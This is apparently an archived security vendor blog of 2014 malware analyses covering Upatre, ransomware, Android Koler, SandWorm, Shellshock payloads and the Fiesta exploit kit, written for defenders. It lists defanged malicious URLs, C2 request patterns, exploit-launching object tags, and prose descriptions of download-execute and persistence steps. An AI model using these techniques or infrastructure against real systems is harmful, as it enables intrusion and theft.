Wednesday, November 12, 2014

Evolution of Upatre Trojan Downloader


Upatre is a Trojan Downloader family that once installed, is responsible for stealing information and downloading additional malware onto the victim machine. It typically arrives via spammed e-mail messages from the Cutwail Botnet, either as an attachment or via a URL pointing to a remote hosting site. We are also seeing Exploit Kits being used as a vector for Upatre infections in the wild.

Upatre Downloader cybercrime network

Upon successful infection, Upatre has been responsible for downloading malicious payloads from known malware families such as:
  • Zeus (Zbot) banking Trojan
  • Rovnix Volume Boot Record (VBR) bootkit
  • Dyreza (DYRE) banking Trojan
The Upatre malware family was first discovered in August 2013 and exponentially increased its infection rates by October, 2013. With the demise of the popular Blackhole Exploit Kit in October 2013, many malware authors resorted to traditional spam with the Upatre Trojan downloader as a medium for delivery of the ultimate payload, which also contributed to the increase in infections.

The Upatre malware authors have deployed multiple new techniques over the past year, which is the reason why it is one of the most prevalent malware families today. Some of the features that we have tracked include:
  • Password protected attachments - This makes the e-mail look more legitimate and confidential
  • Spammed as an attachment inside an attachment - The spammed e-mail messages contained another e-mail message (*.msg, *.eml) as an attachment which contains the actual Upatre archive attachment
  • Email messages containing a URL pointing to the actual payload
  • Randomized header bytes and encrypted malware downloads to evade detection
  • Usage of SSL encryption for Command & Control (C2) communication and subsequent malware downloads
Recent Attacks

We have seen an increase in the number of Upatre Downloader infections occurring through spammed messages containing fake invoices or voice-mail messages in the past month. The final payload being downloaded from these recent Upatre infections tends to be the Dyreza Banking Trojan. Below is a sample e-mail message from this campaign:

Cutwail spam e-mail leading to Upatre

If the user clicks on the link in the e-mail, they will be redirected to the same site with additional information identifying the operating system in the URI before serving the payload as seen here:
GET /documents/invoice_101114_pdf.php?h=[3 digit integer]&w=[4 digit integer]&ua=[User-Agent String]&e=1 HTTP/1.1
The user will then be prompted to download a zipped archive file, which contains a new variant of the Upatre Trojan downloader as seen below:

Upatre download in an archive

The user is redirected to a legitimate site (i.e ""), if the operating system is not supported or is redirected at the end of the download cycle.

The Upatre executable masquerades as a PDF document as seen here:

Upatre executable with PDF icon

The infection cycle begins once the user opens the enclosed executable file. It makes a copy of itself as "%Temp%\pvavq.exe" and runs it. The newly launched process "pvavq.exe", will then delete the original executable "invoice10-11-14_pdf.exe". It connects to a remote C2 server over TCP port 40007 to report the infection and supply information about the Month and Year of spammed binary, victim computer name, operating system information, etc.

Upatre network communication

It further downloads the Dyreza banking Trojan in an encrypted form as "%Temp%\utt214.tmp" on the victim machine to evade network detection. It then decrypts the downloaded payload as "%Temp%\EXE1.exe" and executes it. This will initiate the Dyreza banking Trojan infection cycle.

Dyreza banking Trojan encrypted and decrypted payload

This variant uses an incremental 4-byte XOR key in the decryption routine as opposed to the hardcoded key we have seen before.

Part of Upatre decryption routine for downloaded payload

The following screenshot shows the custom User-Agent string and hard coded remote server locations we found during our Upatre binary analysis:

unpacked Upatre binary

Indicators of Compromise

Here is a sample list of HTTP requests that will provide a good indication of an Upatre and Dyreza compromise on your network:

Upatre indicators of compromise

Additionally, we have seen the following three hardcoded User-Agent strings being used for the HTTP requests in the Upatre variants that we have analyzed:

The Upatre Trojan downloader family continues to evolve and is one of the most prevalent malware families at present. It continues to add new malware to its cyber crime pay-per-install nexus, serving as a vector for downloading and installing additional malware family payloads.

Zscaler ThreatLabZ is actively monitoring this threat and ensuring full security coverage for our customers.

Monday, October 27, 2014

Crypto-Ransomware Running Rampant

There's no doubt that ransomware is one of the most popular malware threats of 2014. Zscaler is not alone in this opinion, as other security firms have observed up to a 700% increase in infection rates to ransom-like malicious activity on victim PCs.  It's no wonder the attacks are so effective when for example, the delivery mechanism is designed to impersonate a legitimate service such as a harmless eFax.

This link is seen from a phishing e-mail.
Ransomware attacks can be monetized quickly and efficiently without the need to create a large scale botnet or expose the attacker's affiliate ID via click-fraud schemes. We've seen multiple attack vectors leveraged to target end users. Some vectors we have monitored include phishing email links or a malvertising campaign which leverages exploit kit distribution. Attackers will often pose as legitimate services, such as a law enforcement agency or a mass media outlet, in order to lure the unsuspecting victim into their scheme.

We recently encountered a ransomware campaign leveraging phishing e-mails purporting to be from the Australian Postal Services
The spam campaign themes used by the attackers involve tracking services or mobile invoices containing a link to the malicious contentUpon completion of a CAPTCHA, the user is provided a zip file which contains a malicious executable posing as a PDF document.

At the time of research, this particular file shows a a detection rate of 16/53 antivirus engines on Virustotal. Before the victim even has a chance to realize their mistake, they are greeted by a message informing them of just how impacted they are.

It's rare for a piece of malware to name itself to the victim...

The goal of Cryptolocker or any other Crypto-Ransomware attack is to encrypt personal files and hold them hostage. The attacker encrypts the files using a specific key which is either obtained during the phone home request to a Command & Control (C2) server, or hard-coded within the malicious executable. In  this case, the malicious executable itself is falsely presenting itself as a valid executable for AQQ IM. 

AQQ is a popular IM application
Cryptolocker's encryption has been an evolving piece of this threat, often relying on asymmetric encryption to lock the victim's files.  In this particular version, the Cryptolocker variant targeted the following folders for encryption:
  •  C:\MSOCache\All Users\
  •  C:\Users\[Public/Username]\
The ".encrypted" files can only the key controlled by the attacker can release them.

The threat will also drop a file in the Windows directory and an associated registry key to launch the file upon boot.  This will ensure that the threat will remain persistent if the victim attempts to reboot their system.

The autostart value is randomly generated.

Cryptolocker will phone home to a hard-coded malicious domain via SSL. The SSL certificate is signed using the printable string 'debian'. This transaction is the secure communication which will provide the specific key needed to encrypt the victim's files.

Viewing the C:\Windows\uhjrajyj.exe in this case will reveal the hardcoded domain used to phone home.
The phone home address is hard-coded within the malicious payload.
Decrypted SSL traffic reveals the initial call back attempt that contains a POST request with victim's machine name and unique ID as seen below:

Decrypted call back attempt
This variant was found to be using a Domain Generation Algorithm for the C2 server communication, similar to the phone home method of Zeus.GameOver.

DGA activity

These domains are largely returning 504 errors now as they have either not yet been registered or have already been shutdown.  A few do were still live at the time of the research.  Zscaler inspected the associated IP addresses and found them to be hosted in the Russian Federation. The two server IP addresses of note at the time of the blog are and  Active ransomware URLs leading to these servers include:
  • usygoseqowapadoh[.]com:443
  • usygoseqowapadoh[.]com/topic.php
  • octoberpics[.]ru:443
  • octoberpics[.]ru/topic.php

Administrators should be on the lookout for the above connections as they likely indicate a compromised system. Given how prevalent this threat is, the U.S. Government recently released an associated alert on the US-CERT site

Taking regular backups of your personal files remains a user's best chance at mitigating the threat if they have been hit by this attack. It is also important for system administrators to enforce  strict file-type access control policies surrounding the download of archive and executable files from unknown sources.

Friday, October 24, 2014

Android Ransomware 'Koler' Learns to Propagate via SMS

Android Koler is a family of ransomware that targets Android users by locking up their mobile devices and demanding a ransom. It is believed to be the mobile extension of the Reveton ransomware family. Ransomware has been a profitable venture in the PC world with the likes of Crytolocker, but is a relative newcomer on mobile devices, at least in part due to file restrictions in mobile operating systems which limit the ability of apps to access the full file system. Despite this fact, the mobile market is clearly one that ransomware operators would like to tap into and Koler is a step in that direction.

In case of this new Koler variant, the malicious Android application arrives via a shortened URL to a Dropbox location and pretends to be an image file. If the unsuspecting user downloads and installs the package, it will lock the user's screen, displaying a fake FBI warning page (see below), accusing the user of viewing child pornography. Additionally, we also found a new self-propagation module that allows it to spread by sending SMS messages containing the shortened URL to all contacts on the compromised device.


Name: IMG_7821.apk
  • android.permission.INTERNET
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_STATE
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.SEND_SMS
  • android.permission.SYSTEM_ALERT_WINDOW

The user's device screen gets locked with following fake warning upon infection:

The ransom amount to unlock the device is U$300 USD as seen below:

Below, we can see the self-propagation code, where Koler sends out text messages containing a link to download the Koler APK, to all the contacts on the infected mobile device.

Full text message that gets sent out:
 "someone made a profile  named -Luca Pelliciari- and he uploaded some of your photos! is that  you?". 

The shortened URL points to a Dropbox location hosting the same ransomware package. The dropbox file has now been taken down.

Upon successful infection, the ransomware also connects to a predetermined command and control server and sends out sensitive device information like build version and device id.

Command and Control callback

The ransomware variant also incorporates an anti-VM technique to avoid being debugged inside an emulator. This is achieved by checking for the value of the Device ID. If the value contains all zeros (indicating the presence on a VM), the application will hide and terminate itself as seen below:


We did not see any file encryption routine to encrypt the user's files, but it is able to lock the screen and stay persistent even after reboot.

It is highly recommended that users install applications from authorized stores only. It is important to check the developer information, ratings for the application, permissions requested upon installation and also ensure that the application has been signed by the developer.


Tuesday, October 14, 2014

Analysis of SandWorm (CVE-2014-4114) 0-Day


iSIGHT Partners, working with Microsoft, today published details of a 0day vulnerability (CVE-2014-4114) used in a possible Russian cyber-espionage campaign targeting NATO, the European Union, the Telecommunications and Energy sectors.

In this blog, we will provide a quick analysis of an exploit payload targeting this vulnerability, presently in the wild and showcase Zscaler's APT detection capabilities.

A vulnerability in Windows Object Linking and Embedding (OLE) package manager could allow an attacker to perform remote code execution on the target system. The attacker exploits this vulnerability via a specially crafted Microsoft Office file with embedded OLE files from a remote location. The remote files in the SandWorm exploit hilighted by iSIGHT Partners include a malicious executable from a known malware family, namely the BlackEnergy Trojan. BlackEnergy malware family first appeared in year 2007 and has been involved in multiple targeted attack campaigns this year.

The exploit payload involved in this case is a PowerPoint Open XML Slide Show file named spiski_deputatov_done.ppsx. This file contains two malicious embedded OLE objects which point to remote files as seen below:
CVE-2014-4114: Embedded OLE Object 1
 The embedded OLE Object 1 contains the remote location of the BlackEnergy Trojan pretending to be an image GIF file.

CVE-2014-4114: Embedded OLE Object 2
The embedded OLE Object 2 contains the remote location of the setup information file - INF file that contains information used by Windows to install drivers. In this case, the INF file slides.inf contains information to rename and execute the BlackEnergy Trojan executable file slide1.gif as seen below:

CVE-2014-4114: slide.inf file
The process flow for this infection cycle looks like below:

CVE-2014-4114: Process flow during a successful exploit cycle
The end user will be completely oblivious to this infection cycle and will see a slide show containing the following images upon execution:

CVE-2014-4114: Exploit payload PPSX images seen by user

Zscaler APT detection

The Zscaler Behavioral Analysis engine accurately flags this 0-day exploit payload as malicious and blocks it as seen in the report below:


All the supported versions of Microsoft Windows and Windows Server 2008 & 2012 operating systems are vulnerable. It is extremely important for the enterprises to install the latest Microsoft security patches to avert these attacks. More information about this vulnerability patch is available here:
Zscaler ThreatLabZ has deployed multiple levels of security countermeasures to protect the customers against these 0-day exploits.

Deepen Desai

Tuesday, October 7, 2014

#BASHed Evolution of Shellshock Attack payloads

We recently blogged about the GNU Bash arbitrary code execution vulnerability (CVE-2014-6271) dubbed as Shellshock and covered some initial attacks that we captured in the wild during the first week of this vulnerability disclosure. We have continued to monitor the Shellshock exploit attacks and the malicious payloads that were getting dropped over past two weeks.

In this blog, we wanted to share a summary of new exploit attacks and new tricks that cybercriminals have deployed to increase the chances of infection.

Shellshock Attack analysis

The first attack, as reported in our previous blog, involved download and installation of a Linux Backdoor Trojan with DDoS capability detected by us as Unix/Flooder.AN.

Here the attack pattern was straight forward, if the bash exploit was successful then a malware payload was getting downloaded and installed.

Perl IRC bots

Next we saw a series of exploit attempts where a Perl based IRC bot was getting downloaded and executed on the target server. We will share two sample cases here.

In the first case, we saw a Base64 encoded Perl based IRC bot getting downloaded, decoded and executed on the target machine.

Shellshock exploit downloading Perl IRC bot

Base64 encoded Perl IRC bot

In the second case, we saw another Perl IRC bot getting downloaded and executed with a command-line argument which is the IRC server IP.

Shellshock exploit downloading Perl IRC bot

Perl IRC bot

The attacker performs following action here before downloading and running the bot:
  • Terminate all the PHP and PERL instances running on the server.
  • Attempts to delete all the content in the /tmp/ and /var/tmp/ directory.
  • Avoids hardcoding the Command and Control server IP in the bot file that gets downloaded.
Things became more interesting after this when we started seeing attacks involving tricks to add stealth and persistence to the infection. We also saw tricks used to prevent any further exploit attempts on the server by attempting to apply security patches to the server once the exploit infection was successful.

Linux.Tsunami C source code

In the attack case shown below, a bash script gets downloaded and executed on the target server upon successful exploit attempt.

Shellshock exploit downloading C IRC bot

Shell script payload downloaded upon successful exploit

The shell script will perform the following actions:
  • Downloads an IRC bot written in C programming language
  • Attempts to compile the C bot program using gcc compiler on the victim server
  • Executes the newly generated ELF IRC bot binary
  • Creates a crontab entry to download and infect the system on a weekly basis
This is a way of establishing persistence, even if the system administrator identifies and removes the culprit file the system will again get infected when the cronjob triggers. The attacker is also transferring a plain-text file as oppose to an ELF binary in an attempt to evade network perimeter defenses.

Linux.Tsunami ELF binary

In the most recent case, the attacker first ensures that the current bash session does not get recorded to the history file. It then also involved a shell script getting downloaded and executed on the target server as seen below:

Shellshock exploit attempt downloading Linux.Tsunami

Shell script payload downloaded upon successful exploit

The shell script will perform the following actions:
  • Downloads and executes a new variant of Linux.Tsunami DDoS bot
  • Create crontab entry to ensure future update and persistence
  • Attempts to download and patch the Bash vulnerability in an attempt to prevent new infections from competitors?
  • Uses shred command before deleting itself (downloaded shell script)
shred command Overwrite the specified FILE(s) repeatedly, in order to make it harder for even very expensive hardware probing to recover the data.


We have seen a quick evolution in the Shellshock exploit attack payloads that can be broadly classified into following categories:
  • Persistence - achieved by creating cronjob.
  • Evasion - payload Base64 encoding (Perl bot) and plain-text C source code transfer.
  • Stealth - prevents recording of bash session history, usage of shred and rm commands.
  • Competitive Advantage - removing other exploit payloads, installing new payload and applying security patches to prevent further exploit & infection attempts.
It is extremely important for the system administrators to test if their server is vulnerable and apply appropriate security patches as described in our previous blog. It is also important to check for the indicators of compromise mentioned in the above attack cases.

Zscaler customers are protected from this threat and the associated malware payloads. Zscaler ThreatLabZ is actively monitoring this threat and associated attacks in the wild.

Monday, September 29, 2014

Fiesta Exploit Kit: Live Infection

During our daily hunt for Exploit Kits (EK), we came across many live Fiesta exploit chains.
The infection started from the following compromised domains:

Compromised sites:

The attackers often leverage compromised sites to serve as the first level of redirection in the EK infection cycle. In the first Fiesta EK instance that we analyzed, the attacker after getting the root access has modified the “scripts.js” file present at location:
  •       hxxp://www[.]media[.]orpi[.]com/js/scripts.js
All the pages importing this JavaScript file will redirect the user to "nvplus[.]com/wp-content/".

Another variation of the initial loading page redirection was observed in the compromised site “interfacelift[.]com” at the following location:
  •       hxxp://interfacelift[.]com/wallpaper/downloads/date/any/   
In this case the attacker added a <script> tag with the location pointing to another redirection site at:
  •          hxxp://sunduk[.]biz/forum/docs/

A third variation of the initial redirection was observed on the compromised site
"soyentrepreneur[.]com", where the attacker created a new JavaScript file “funcionesCarga.js” at the following locations:
  •          hxxp://www[.]soyentrepreneur[.]com/assets/js/funcionesCarga.js
  •          hxxp://www[.]soyentrepreneur[.]com/assets/js/se2013/funcionesCarga.js
The website pages importing these JavaScript files will redirect the user to the Fiesta loading site.

All three initial redirection methods are fairly stealth and can remain unnoticed for days to the web administrators. We found this approach to be more effective and completely opposite from a RIG EK compromise that we recently analyzed where the attacker changed the home page of the website to ensure redirection. 

Fiesta EK:

Some of the recent live Fiesta EK loading sites found in the wild are:
  •        nvplus[.]com/wp-content/
  •        son-ko[.]com/scripts/bundles/login.php
  •        sunduk[.]biz/forum/docs/login.php
  •        toringaz[.]com/images/
  •        barferoase[.]de/blog/wp-content/themes/
  •        www.artlen[.]com/assets/cache/rss/
  •        www.courieru[.]com/cache/joomsef/
  •        www.roofstroy[.]com/stroy/js.php
  •        ticketstolisbon[.]com/dumper/
  •        talktyme[.]com/flash/
Apart from the usual EK redirection chain, it checks for the user's browser as well as presence of application plugins for Microsoft Silverlight and Adobe Flash.

It checks if Silverlight plugin is installed by creating the following ActiveXObject object:
  •  ActiveXObject("AgControl.AgControl") 
The presence of Flash plugin is ensured by creating the following object:
  • swfobject.embedSWF()
If both the above object creation functions generate an exception, then the exploit cycle terminates. But if the vulnerable versions are found, it takes the user to the EK landing page.

Redirection to Fiesta EK Landing page

Fiesta Landing Page:

Initially, the malicious Silverlight and Flash files are downloaded for which the plugin checks have already been performed.

AV detection for the downloaded malicious files:

  •       rtu.swf: 2/55 (Generic Exploit)
  •       rtp.xap: 2/54 (CVE-2013-0074)

Following this, the main controller of Fiesta EK is called. Example in one of the Fiesta EK instance we analyzed:
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/1
It generates the following GET requests to the same domain during the course of the Exploit cycle:

·         hxxp://hjwqk.ianlar[.]in/pofrj4l/321eabf3f523be344045575e50595404020b045e5500560806060006515a5e04;120000;0
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/6ea46961ad8578015717000f07020406075c540f025b060a0351505706010e06
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/7a77e441c530b7c15419520c540f06060658020c5156040a02550654550c0c06;1;2@@
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/1b88a025c530b7c1521a5d03500b0002005b0d035552020e0456095b51080a02;1;3@@
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/675e60f2d4cb58ae5c59595e070b5405070e005e025256090303040606085e05
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/2a78dd2dfa898b9d5b045b03555f0053035802035006025f0755065b545c0a53
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/33603690d9fdeed05f5a540b020d0b07020a030b0754090b06070753030e0107;900
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/2a7f53d52bfa0822410d415d040856020358025d0151540e07550605050b5c02;5061118
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/61295aeb0e3b886755415902045a575507080702010355590305035a05595d55;5;1
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/3bb805820e3b886750120903010e0a05025b5703045708090656535b000d0005;6;1
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/535c3355fb26fbd956435e5802080702040a00580751050e00070400030b5405;1;1

The Fiesta EK is performing the following exploitation attempts which are resulting in the multiple GET requests:

Adobe Flash
  • Checks if Adobe Flash is installed and gets the application version.
  • It then generates a GET request to fetch the run-time parameters for the previously downloaded SWF file "rtu.swf".
  •       A sample object of type “application/x-shockwave-flash” with dynamic run-time parameters to run the exploit payload is created as shown below:
“<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='FnkwX'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='wetsgk=MWYzH'/><param name='Play' value='0'/></object>"

Microsoft Silverlight 
  • Checks if Microsoft Silverlight is installed in browser and gets the application version.
  • It then generates a GET request to fetch the run-time parameters for the previously downloaded XAP file "rtp.xap".
  • A sample object of type "application/x-silverlight" with dynamic run-time parameters to run the exploit payload is created as shown below:
"<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='LVSDE'/><param name='initParams' value=<LONG_STRING_VALUE></object>"

  • Check if Java plugin is installed and enabled in the browser.
  • Downloads a malicious Java archive (JAR) based on the installed version:
    • JAR File -> ianlar.jar: 4/55 (CVE-2012-1723)
  • It then generates a subsequent GET request to fetch parameter values required to execute the malicious JAR payload.
  • Creates a custom applet tag utilizing the run-time parameter values to run the exploit payload as seen below:

Adobe Reader
  •        Checks for the presence of the Adobe Reader plugin.
  •        Downloads and executes the malicious PDF file: 
    •        PDF File -> Ianlar.pdf: 8/55  


Upon successful exploitation, Fiesta EK was observed installing a new variant of Zemot Trojan from the following location:
  •       hxxp://warzine[.]su/b/shoe/54602
This is a well known Click-Fraud Botnet family which will soon start click-fraud activity on the victim machine, making money for the malware authors.

This Click-Fraud malware family appears to be connected to many other EKs in addition to Fiesta. Some of the domains involved in the Click-Fraud activity:

The above domains were resolving to the following two servers located in Russia and Ukraine respectively:
 A GET request to any of these domains look like this:

- Sameer Patil